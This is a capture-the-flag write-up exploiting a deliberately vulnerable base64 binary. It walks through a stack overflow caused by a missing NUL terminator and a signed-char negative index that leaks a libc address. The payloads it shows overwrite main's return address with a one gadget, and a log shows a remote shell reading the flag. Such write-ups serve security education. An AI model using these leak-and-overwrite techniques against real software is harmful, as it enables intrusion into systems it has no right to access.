You can find the challenge files here.
Hackers always love base64.
nc 185.14.184.242 9990
This challenge provided a binary that took some input from the user, and either base64 encoded or base64 decoded it.
In my opinion, heap note style challenges are really boring these days, so it was refreshing to see a challenge like this and solve it together with the team!
First, protections:
$ checksec --file ./chall
[*] './chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
All protections except a canary implies we may be dealing with a stack buffer overflow.
Fortunately for us, the source was provided. The binary basically shows this menu:
$ ./run.sh
1. Encode
2. Decode
x. Exit
>
The main function is very simple:
#define BUFFER_SIZE 0x40
int main(void) {
int choice;
void (*b64func[])(const char*, char*, int) = {b64encode, b64decode};
char input[BUFFER_SIZE], output[BUFFER_SIZE];
memset(input, 0, BUFFER_SIZE);
memset(output, 0, BUFFER_SIZE);
for(cnt = 0; cnt < 10; cnt++) {
// read user input
choice = menu();
if (choice < 1 || choice > 2) break;
// encode | decode
readline("Input: ", input, BUFFER_SIZE);
b64func[choice-1](input, output, strlen(input));
// show result
if (b64chkerr()) {
printf("Error: %s\n", b64errmsg());
} else {
printf("Output: %s\n", output);
}
}
puts("Bye!");
}
The code has two function pointers on the stack from a base64 library (libbase64.so
), followed by two buffers for the input
and output
, both of which are 0x40
bytes in size.
It essentially does the following:
- Asks whether you want to encode or decode some string.
- Stores your input inside
input
. - Stores the encoded / decoded output into
output
. - Prints the output. If an error occurs, it prints the error instead.
The first thing you'll notice is that the input
and output
buffers have the same size. Why is this a problem? Well, consider the following:
$ echo -n "A" | base64
QQ==
As you can see, encoding one byte turned into a 4 byte output. Similarly, if you attempt to encode 0x40 bytes, you will see the problem:
>>> from base64 import *
>>> b64encode(b"A"*0x40)
b'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=='
>>> len(_)
88
>>> hex(_)
'0x58
As you can see, we have an overflow of 0x18 bytes past the output
buffer.
Note that the same bug does not exist when decoding some input. Any 4-byte encoded input can be decoded into either 1, 2, or 3 bytes, so the overflow will be non-existent.
Unfortunately though, this isn't exploitable for two reasons:
- The most obvious reason - we're forced to overflow with any bytes in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" (i.e valid base64 encoded output). This isn't nearly enough bytes to overwrite the return address with a valid address in order to ROP or etc.
- A less obvious reason - the return address is 0x28 bytes past the end of the
output
buffer, so it's impossible to reach it. There is nothing of interest between theoutput
buffer and thereturn
address (see the stack layout in the next section).
The stack layout for the main function is as follows:
+-------------------------+ |
| choice | |
+-------------------------+ |
| b64.* function pointers | | addresses growing
+-------------------------+ | larger downwards
| input buffer | |
+-------------------------+ |
| output buffer | |
+-------------------------+ v
Looking at readline
, the bug is pretty obvious:
void readline(const char *msg, char *buf, int size) {
int s;
if (msg) printf("%s", msg);
if ((s = read(0, buf, size)) <= 0) exit(0);
if (buf[s-1] == '\n') buf[s-1] = 0;
else if (s < size) buf[s] = 0;
}
readline
is only ever called with the size argument set to BUFFER_SIZE == 0x40
. If we read in exactly 0x40 bytes of input and don't input a NULL byte at the end, then the input
and output
buffers will be connected without a NULL byte between them.
When the program finally calls b64func[choice-1](input, output, strlen(input));
, the size argument is passed in as strlen(input)
. Remember that strlen
stops at NULL bytes, so if the input
buffer doesn't end with a NULL byte, it will include whatever bytes are in the output
buffer in its length calculation.
In order to see why this is a problem, we have to look at one of the b64encode
or b64decode
functions (they behave similarly in this regard):
void b64decode(const char *input, char *output, int size) {
int i, j, k, len;
unsigned int block;
char c;
const char *ptr;
__b64_error = B64_ERROR_NONE;
/* Check input length */
for(ptr = input; *ptr; ++ptr);
len = (int)(ptr - input); // [ 1 ]
if (len % 4) {
__b64_error = B64_ERROR_INVALID_LEN;
return;
}
/* Decode */
for(i = j = 0; j < len; i += 3, j += 4) { // [ 2 ]
block = 0;
for(k = 0; k < 4; k++) {
c = b64_reverse_table[input[j+k]];
if (c == -1) {
__b64_error = B64_ERROR_INVALID_CHAR;
return;
}
block = (block << 6) | c;
}
output[i+0] = block >> 16;
output[i+1] = (block >> 8) & 0xff;
output[i+2] = block & 0xff;
}
/* Null terminate */
output[i] = 0;
}
Looking at the code for b64decode
, it goes into a loop at [ 2 ]
, performs the decoding, and writes the final output to output[i+0]
, output[i+1]
, and output[i+2]
.
This code looks okay at first glance (except for the fact that the size
is never used), but consider the bug we just talked about. If we trigger it successfully, then the len
calculated at [ 1 ]
will also include the bytes within the output
buffer. Since the input
and output
buffers are both 0x40
bytes in size, if we ensure both the input
and output
buffers are full at this point, then the final len
calculated will be 0x80
, which will definitely cause the decoded output to overflow past the output
buffer!
Me and kileak spent quite a few hours working on exploiting the binary with this bug. We were mainly trying one thing: partially overwrite the 3 least significant bytes of the return address of main
(which is a libc address) to point to a one gadget, and then just bruteforce to get a shell remotely.
The main reason we were trying this was because of r4j and hk's new libpwntools. Written in C++, this is a very very performant version of pwntools that allows you bruteforce a one gadget's address straight from main
's return address in approximately 20 seconds!
Looking at the code for b64decode
above, we can see that it null terminates the output before returning it at the end, which would be a problem for the bruteforce. However, we can bypass this constraint easily: there is an error condition inside the decode loop that can cause it to return early without null terminating the input. If we can cause it to error out right after we've partially overwritten the return address of main with a valid one gadget's address, we can just proceed to bruteforce and wait for a shell.
The real challenge of course, is being able to do that in the first place. We spent many hours trying to get this done, but could not do it.
One thing I noticed was that sometimes our input would end up with non-deterministic decoded output (like a NULL byte randomly in the middle of the decoded output somewhere). I didn't think anything of this at the time, but this ended up being the key to solving the challenge, so we'll get back to that a little later.
I did however manage to overwrite the return address completely with the following setup. It's a little hard to explain exactly what's going on, but we basically cause our input to be decoded to valid base64, which will cause that to be decoded to valid base64, and finally that will again be decoded to valid ASCII, which overwrites the return address:
decode(b64encode(b64encode(b64encode(b"BBB"*9))))
decode(b64encode(b64encode(b64encode(b"BBB"*9))))
decode(b64encode(b64encode(b64encode(b"BBB"*6 + b"BB" + b"A"*6))))
This will overwrite main
's return address to 0x0000414141414141
. However, this is useless without a leak, so let's keep work on that.
If we check the stack before we've input anything, we can see that the return address is set out like this:
+---------------+----------------+
| | |
| NULL | libc_csu_init |
+---------------+----------------+
| | some stack |
| _start | address |
+---------------+----------------+
| | main's |
| NULL | ret address |
+---------------+----------------+
So rather than leaking the return address, we could also try leaking the libc_csu_init
or _start
addresses. Both of these addresses are in the binary rather than in libc, but we can then ROP to leak a libc address and then get a shell.
A small problem here was that both the _start
and __libc_csu_init
addresses have a NULL byte as their LSB
. However, I found out that with the following setup (see exploit script for the functions), I could overwrite the LSB of _start
with 0x41
:
encode(b"A"*0x30)
decode(b64encode(b64encode(b"A"*33)) + b64encode(b"A"*3))
Notice that I stopped the loop early in an error condition with the final b64encode(b"A"*3)
. This prevents the NULL byte from being appended to the output
buffer. We can see the payload work here:
gef➤ x/11gx 0x00007ffd97b02f00+0x40
0x7ffd97b02f40: 0x4246555142465551 0x4246555142465551 <- output buffer
0x7ffd97b02f50: 0x4246555142465551 0x4246555142465551
0x7ffd97b02f60: 0x4246555142465551 0x4141410042465551
0x7ffd97b02f70: 0x4141414141414141 0x4141414141414141
0x7ffd97b02f80: 0x4141414141414141 0x4141414141414141 <- __libc_csu_init
0x7ffd97b02f90: 0x00007f5a6b093b41 <- _start (LSB overwritten)
My idea was then to encode an input of "A"*0x40
, which would end up encoding the address and returning it. I could then just decode it myself and get a leak.
In hindsight, this will obviously not work, because the address will be overwritten by our encoded output long before it's used as an input to encode (hindsight is 20/20, as usual).
However, even assuming that it would work, we have another problem. If you look closely at 0x7ffd97b02f60+8
above, you'll see that there is a null byte in the middle of the decoded output. This will cause the strlen(input)
to stop there, and we will never be able to encode the address.
At this point, I spent a little longer figuring out why this NULL byte was being inserted here, but couldn't figure it out. It was mostly because I was feeling very lazy and just couldn't be bothered understanding the decode algorithm :p
It was at this point that RBTree decided to join and have a look at the challenge. While I was being lazy doing other non-CTF things, he managed to find out more about that non-deterministic output that I mentioned previously when decoding. It took him 2 hours to find that there was a much more subtle bug in the b64encode
and b64decode
functions.
Let's look at b64decode
again:
void b64decode(const char *input, char *output, int size) {
// [ ... ]
/* Decode */
for(i = j = 0; j < len; i += 3, j += 4) {
block = 0;
for(k = 0; k < 4; k++) {
c = b64_reverse_table[input[j+k]]; // [ 1 ]
if (c == -1) {
__b64_error = B64_ERROR_INVALID_CHAR;
return;
}
block = (block << 6) | c;
}
// [ ... ]
}
/* Null terminate */
output[i] = 0;
}
At [ 1 ]
, we see that it accesses b64_reverse_table[input[j+k]]
. The reverse table is initialized by storing all the possible bytes (in a certain order) that any valid base64 encoded input can be decoded into. The algorithm uses these stored bytes to decode our base64 encoded input. It behaves correctly here, but there is a very subtle bug.. char
's are actually considered signed
by default! In hindsight, this makes perfect sense, but I, for some reason, always assumed that char
's were unsigned
by default.
In this case, input[j+k]
is a char
, which is a 1 byte int
. RBTree managed to figure out that any input byte that has an ordinal value greater than 0x7f is considered a negative number here, and thus will access memory behind b64_reverse_table
!
Let's have a look at the memory real quick:
gef➤ x/28gx 0x7f5a6b092060 - 0x70
0x7f5a6b091ff0: 0x0000000000000000 0x00007f5a6aae3520 <- libc address!
0x7f5a6b092000: 0x0000000000200e10 0x00007f5a6b4bc000
0x7f5a6b092010: 0x00007f5a6b2ae750 0x00007f5a6ae91696
0x7f5a6b092020: 0x00007f5a6b092020 0x0000000000000000
0x7f5a6b092030: 0x0000000000000000 0x0000000000000000
0x7f5a6b092040 <completed.7698>: 0x0000000000000000 0x0000000000000000
0x7f5a6b092050: 0x0000000000000000 0x0000000000000000
0x7f5a6b092060 <b64_reverse_table>: 0xffffffffffffffff 0xffffffffffffffff
0x7f5a6b092070 <b64_reverse_table+16>: 0xffffffffffffffff 0xffffffffffffffff
0x7f5a6b092080 <b64_reverse_table+32>: 0xffffffffffffffff 0x3fffffff3effffff
0x7f5a6b092090 <b64_reverse_table+48>: 0x3b3a393837363534 0xffff00ffffff3d3c
0x7f5a6b0920a0 <b64_reverse_table+64>: 0x06050403020100ff 0x0e0d0c0b0a090807
0x7f5a6b0920b0 <b64_reverse_table+80>: 0x161514131211100f 0xffffffffff191817
0x7f5a6b0920c0 <b64_reverse_table+96>: 0x201f1e1d1c1b1aff 0x2827262524232221
gef➤ xinfo 0x00007f5a6aae3520
────────────────────────────────────────────────────────────────────────── xinfo: 0x7f5a6aae3520 ──────────────────────────────────────────────────────────────────────────
Page: 0x00007f5a6aaa0000 → 0x00007f5a6ac87000 (size=0x1e7000)
Permissions: r-x
Pathname: ./libc.so.6
Offset (from page): 0x43520
Inode: 120325114
Segment: .text (0x00007f5a6aac12d0-0x00007f5a6ac39c3c)
Offset (from segment): 0x22250
Symbol: __cxa_finalize
As seen in the output above, at &b64_reverse_table - 0x68
, we have a libc address!
The idea for the leak is simple now. Using the negative indexing bug above, we can cause the b64decode
function to return the bytes from that libc
address at &b64_reverse_table - 0x68
to us as decoded output. However, doing it the trivial way won't work. Why? Well, let's look at the b64decode
function one last time:
void b64decode(const char *input, char *output, int size) {
// [ ... ]
/* Check input length */
for(ptr = input; *ptr; ++ptr);
len = (int)(ptr - input);
if (len % 4) {
__b64_error = B64_ERROR_INVALID_LEN;
return;
}
/* Decode */
for(i = j = 0; j < len; i += 3, j += 4) {
block = 0;
for(k = 0; k < 4; k++) {
c = b64_reverse_table[input[j+k]]; // [ 1 ]
if (c == -1) {
__b64_error = B64_ERROR_INVALID_CHAR;
return;
}
block = (block << 6) | c; // [ 2 ]
}
// [ 3 ]
output[i+0] = block >> 16;
output[i+1] = (block >> 8) & 0xff;
output[i+2] = block & 0xff;
}
/* Null terminate */
output[i] = 0;
}
At [ 1 ]
, assuming we trigger the bug with an input byte that has an ordinal value of -0x68
, this will access b64_reverse_table[-0x68]
. However, there is a length check that ensures that the input is a multiple of 4 bytes, which means we will also have to input three other bytes along side the negative index.
The problem here occurs at [ 2 ]
and [ 3 ]
. At [ 2 ]
, the byte read for c
is stored inside block
, but block
itself is left shifted by 6 for each byte. At [ 3 ]
, block is right shifted by 16
, 8
, and 0
when being stored.
The problem here is that the decoded output cannot trivially be converted back to its original form if the output has any byte > 0x7f inside it. Consider the following
>>> # Our input will be "BBBB"
>>> hex(ord("B"))
'0x42'
>>> # b64_reverse_table[0x42] is just 0x01
>>> block = 0
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block
266305
>>> bin(block)
'0b1000001000001000001'
>>> output1 = block >> 16
>>> output2 = (block >> 8) & 0xff
>>> output3 = block & 0xff
>>> output1
4
>>> output2
16
>>> output3
65
>>> bin(output1)
'0b100'
>>> bin(output2)
'0b10000'
>>> bin(output3)
'0b1000001'
>>> bin(0x42)
'0b1000010'
If you notice above, the final decoded output will be "\x04\x10\x41". Note how this is not visually encodable back to "BBBB". Now, if you try to run this through the encode
function, this will decode just fine because every byte is <= 0x7f.
However, running the following through the b64encode
function will trigger a segfault:
encode(b"\x80"*4)
The reason this occurs is because the negative indexing bug also exists inside the b64encode
function, and this causes it to access a very large negative index inside the b64_table
, which hits unmapped memory and crashes.
So, how do we figure out what the leaked bytes are if they are going to just crash the binary like this? Well, we could try to use pwntools base64.b64encode
to encode the bytes back, but this returns other encoded bytes because of reasons ™️
RBTree of course, had a great solution to this problem. If we can pick some input such that c
ends up having it's two least significant bits set to 0, then we don't actually lose any information when right shifting and storing the different parts of the block
into the output
, since the left shift by 6 will still basically look like a left shift by 8 (the bottom two bits are zeroed).
One such possible c
is when our input is "8"
:
>>> # Our input is "8888"
>>> ord("8")
56
>>> # b64_reverse_table[56] is 0x3c
>>> bin(0x3c) # Notice the two least significant bits!
'0b111100'
>>> block = 0
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> hex(block)
'0xf3cf3c'
>>> output1 = block >> 16
>>> output2 = (block >> 8) & 0xff
>>> output3 = block & 0xff
>>> hex(output1)
'0xf3'
>>> hex(output2)
'0xcf'
>>> hex(output3) # Notice our last input to block was 0x3c
'0x3c'
As you can see, we can visually see the very last byte that was OR'd into block
in the output! In this case, it's just 0x3c, but this byte can now be a byte from our libc leak and we'll be able to use it directly.
So the idea now is to leak each byte of the libc address by setting the string to b"888"
followed by the negative index. This will cause the last byte (the leaked byte) to not be interfered with, since the "8"
before it will have it's two least significant bits set to 0. We can achieve this with the following code:
# Libc address is at &b64_reverse_table - 0x68.
# No need to leak LSB or the 6th byte, since those are constant.
decode(b"888\x99888\x9a888\x9b888\x9c")
Where 0x99
being the same as -0x67
, and etc..
After this, we can overwrite the return address with a one gadget as shown in the First few hours section.
The final exploit script can be found here.
$ ./exploit.py
[*] './chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] './libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 185.14.184.242 on port 9990: Done
[*] Libc base: 0x7f6f313c5000
[*] Switching to interactive mode
Bye!
$ ls
chall
flag-2ab34690951adedf25f0c6e31fbc4b2b.txt
ld-2.27.so
libbase64.so
libc.so.6
redir.sh
$ cat flag-2ab34690951adedf25f0c6e31fbc4b2b.txt
S4CTF{_1mpL1c1t__tyP3__c0nv3rS10N}